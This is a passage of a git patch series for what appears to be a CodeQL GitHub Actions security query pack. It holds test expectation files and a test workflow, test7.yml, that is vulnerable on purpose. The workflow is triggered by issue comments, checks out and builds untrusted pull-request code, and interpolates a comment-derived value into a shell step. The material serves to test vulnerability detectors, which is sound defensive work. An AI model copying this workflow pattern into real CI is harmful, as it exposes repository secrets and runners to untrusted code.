.github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | @@ -438,6 +569,45 @@ cfgNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -516,6 +686,41 @@ dfNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | @@ -595,6 +800,41 @@ nodeLocations | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:23:93 | .github/workflows/poisonable_steps.yml@5:5:23:93 | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:8:9:9:6 | .github/workflows/poisonable_steps.yml@8:9:9:6 | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:8:14:8:32 | .github/workflows/poisonable_steps.yml@8:14:8:32 | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:9:9:10:6 | .github/workflows/poisonable_steps.yml@9:9:10:6 | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:9:14:9:42 | .github/workflows/poisonable_steps.yml@9:14:9:42 | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:10:9:11:6 | .github/workflows/poisonable_steps.yml@10:9:11:6 | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:10:14:10:41 | .github/workflows/poisonable_steps.yml@10:14:10:41 | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:11:9:12:6 | .github/workflows/poisonable_steps.yml@11:9:12:6 | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:11:14:11:42 | .github/workflows/poisonable_steps.yml@11:14:11:42 | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:12:9:13:6 | .github/workflows/poisonable_steps.yml@12:9:13:6 | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:12:14:12:32 | .github/workflows/poisonable_steps.yml@12:14:12:32 | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:9:14:6 | .github/workflows/poisonable_steps.yml@13:9:14:6 | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:13:14:13:36 | .github/workflows/poisonable_steps.yml@13:14:13:36 | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:9:15:6 | .github/workflows/poisonable_steps.yml@14:9:15:6 | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:14:14:14:44 | .github/workflows/poisonable_steps.yml@14:14:14:44 | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:9:16:6 | .github/workflows/poisonable_steps.yml@15:9:16:6 | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:15:14:15:56 | .github/workflows/poisonable_steps.yml@15:14:15:56 | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:9:17:6 | .github/workflows/poisonable_steps.yml@16:9:17:6 | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:16:14:16:56 | .github/workflows/poisonable_steps.yml@16:14:16:56 | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:9:18:6 | .github/workflows/poisonable_steps.yml@17:9:18:6 | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:17:14:17:40 | .github/workflows/poisonable_steps.yml@17:14:17:40 | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:9:19:6 | .github/workflows/poisonable_steps.yml@18:9:19:6 | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:18:14:18:50 | .github/workflows/poisonable_steps.yml@18:14:18:50 | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:9:20:6 | .github/workflows/poisonable_steps.yml@19:9:20:6 | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:19:14:19:29 | .github/workflows/poisonable_steps.yml@19:14:19:29 | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:9:21:6 | .github/workflows/poisonable_steps.yml@20:9:21:6 | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:20:14:20:73 | .github/workflows/poisonable_steps.yml@20:14:20:73 | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:9:22:6 | .github/workflows/poisonable_steps.yml@21:9:22:6 | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:21:14:21:78 | .github/workflows/poisonable_steps.yml@21:14:21:78 | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:9:23:6 | .github/workflows/poisonable_steps.yml@22:9:23:6 | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:22:14:22:76 | .github/workflows/poisonable_steps.yml@22:14:22:76 | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:23:9:23:93 | .github/workflows/poisonable_steps.yml@23:9:23:93 | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:14:23:92 | .github/workflows/poisonable_steps.yml@23:14:23:92 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | @@ -615,6 +855,7 @@ nodeLocations scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml new file mode 100644 index 00000000000..44f5602ee06 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml @@ -0,0 +1,58 @@ +name: Benchmark + +on: + issue_comment: + types: [created] + +env: + TURBO_TOKEN: ${{ secrets.TURBO_TOKEN }} + TURBO_TEAM: ${{ secrets.TURBO_TEAM }} + FORCE_COLOR: true + +jobs: + benchmark: + if: ${{ github.repository_owner == 'foo' && github.event.issue.pull_request && startsWith(github.event.comment.body, '!bench') }} + runs-on: ubuntu-latest + permissions: + contents: read + steps: + - uses: actions/checkout@v4 + with: + persist-credentials: false + ref: refs/pull/${{ github.event.issue.number }}/head + + - name: Setup PNPM + uses: pnpm/action-setup@v3 + + - name: Setup Node + uses: actions/setup-node@v4 + with: + node-version: 18 + cache: "pnpm" + + - name: Install dependencies + run: pnpm install + + - name: Build Packages + run: pnpm run build + + - name: Get bench command + id: bench-command + env: + # protects from untrusted user input and command injection + COMMENT: ${{ github.event.comment.body }} + run: | + benchcmd=$(echo "$COMMENT" | grep '!bench' | awk -F ' ' '{print $2}') + echo "bench=$benchcmd" >> $GITHUB_OUTPUT + shell: bash + + - name: Run benchmark + id: benchmark-pr + run: | + result=$(pnpm run --silent benchmark ${{ steps.bench-command.outputs.bench }}) + processed=$(node ./benchmark/ci-helper.js "$result") + echo "BENCH_RESULT<> $GITHUB_OUTPUT + echo "### PR Benchmark" >> $GITHUB_OUTPUT + echo "$processed" >> $GITHUB_OUTPUT + echo "BENCHEOF" >> $GITHUB_OUTPUT + shell: bash diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index d95cf6fef09..124a26b1d47 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -16,4 +16,5 @@ | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref '4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref '1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref '3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref '1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 78e2afa2747..f2d229e80bb 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -304,6 +304,27 @@ edges | .github/workflows/test6.yml:19:9:39:6 | Uses Step | .github/workflows/test6.yml:39:9:43:6 | Run Step | | .github/workflows/test6.yml:19:9:39:6 | Uses Step | .github/workflows/test6.yml:43:9:45:52 | Run Step | | .github/workflows/test6.yml:39:9:43:6 | Run Step | .github/workflows/test6.yml:43:9:45:52 | Run Step | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:24:9:27:6 | Uses Step | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:27:9:33:6 | Uses Step | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:27:9:33:6 | Uses Step | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | +| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | +| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | +| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:33:9:37:34 | Run Step | @@ -335,5 +356,8 @@ edges | .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | From 56b70981ae823bbe19fd50e6cd9985d6b9f6e21f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 5 Jul 2024 18:18:04 +0200 Subject: [PATCH 0379/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 59ab88b42e4..dd99208f5e3 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.13 +version: 0.1.14 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f25fd70619f..fe02dad9c55 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.13 +version: 0.1.14 groups: [actions, queries] suites: codeql-suites extractor: javascript From bc483fc380e5303a8939f695d885ec6d50ddd1ae Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 6 Jul 2024 22:44:57 +0200 Subject: [PATCH 0380/1267] Add poisonable step test --- .../.github/workflows/poisonable_steps.yml | 3 +- .../library-tests/poisonable_steps.expected | 3 +- ql/test/library-tests/test.expected | 161 ++++++++++-------- 3 files changed, 90 insertions(+), 77 deletions(-) diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml index 3e31507cef1..608b3d5a09f 100644 --- a/ql/test/library-tests/.github/workflows/poisonable_steps.yml +++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml @@ -21,5 +21,4 @@ jobs: - run: python scripts/generate_theme.py --outfile js/storybook/theme.css - run: ruby scripts/generate_theme.rb --outfile js/storybook/theme.css - run: bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css - - + - run: xvfb-run ./mvnw clean package diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index 62ffff3c15c..52f38506f09 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -15,4 +15,5 @@ | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index efb0bca6952..19eda82df48 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -6,20 +6,20 @@ files workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs @@ -61,7 +61,8 @@ steps | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | @@ -106,7 +107,8 @@ runSteps | 